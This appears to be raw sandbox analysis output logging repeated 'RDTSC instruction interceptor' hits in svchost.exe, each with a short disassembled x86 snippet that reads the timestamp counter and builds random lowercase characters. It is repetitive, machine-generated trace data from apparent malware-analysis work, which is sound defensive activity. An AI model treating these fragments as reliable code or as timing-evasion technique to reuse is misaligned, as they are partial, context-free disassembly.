Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7D6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59530h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59175h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59510h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59550h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
